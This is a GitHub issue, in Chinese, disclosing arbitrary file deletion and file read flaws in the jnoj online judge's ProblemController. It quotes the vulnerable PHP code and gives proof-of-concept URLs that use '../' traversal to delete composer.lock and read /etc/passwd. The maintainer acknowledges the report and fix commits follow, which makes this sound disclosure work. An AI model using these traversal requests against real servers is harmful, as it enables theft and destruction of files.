Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

任意文件删除和读取漏洞 #53

Closed
thiscodecc opened this issue Oct 10, 2019 · 1 comment
Closed

任意文件删除和读取漏洞 #53

thiscodecc opened this issue Oct 10, 2019 · 1 comment

Comments

@thiscodecc
Copy link

thiscodecc commented Oct 10, 2019
edited
Loading

1.任意文件删除
代码 app\modules\polygon\controllers\ProblemController 89行到113行

 public function actionDeletefile($id, $name)
    {
        $model = $this->findModel($id);
        if ($name == 'in') {
            $files = $model->getDataFiles();
            foreach ($files as $file) {
                if (strpos($file['name'], '.in')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
            }
        } else if ($name == 'out') {
            $files = $model->getDataFiles();
            foreach ($files as $file) {
                if (strpos($file['name'], '.out')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
                if (strpos($file['name'], '.ans')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
            }
        } else {
            @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
        }
        return $this->redirect(['test-data', 'id' => $model->id]);
    }

unlink的时候没有对传入的文件做校验,可以导致任意文件删除,请求url
http://127.0.0.1/jnoj/web/polygon/problem/deletefile?id=1&name=../../../../jnoj/composer.lock

delete2

2.任意文件读取

代码 app\modules\polygon\controllers\ProblemController 115行到121行

public function actionViewfile($id, $name)
    {
        $model = $this->findModel($id);
        echo '<pre>';
        echo file_get_contents(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
        echo '</pre>';
    }

请求url
http://127.0.0.1/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd

read1

修复建议:对传入的文件名称做校验.
@shi-yang
Copy link
Owner

ok,感谢反馈

bobby285271 pushed a commit to scnu-socoding/scnuoj-2020 that referenced this issue Oct 4, 2020
@shi-yang
Fixes shi-yang#53: 修复一些漏洞
e866223
bobby285271 pushed a commit to scnu-socoding/scnuoj-2020 that referenced this issue Jan 25, 2021
@shi-yang
Fixes shi-yang#53: 修复一些漏洞
3f3d0f5 
Former-commit-id: bfcd740fb538730c51952d02993b5439c1f0bae5
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@shi-yang @thiscodecc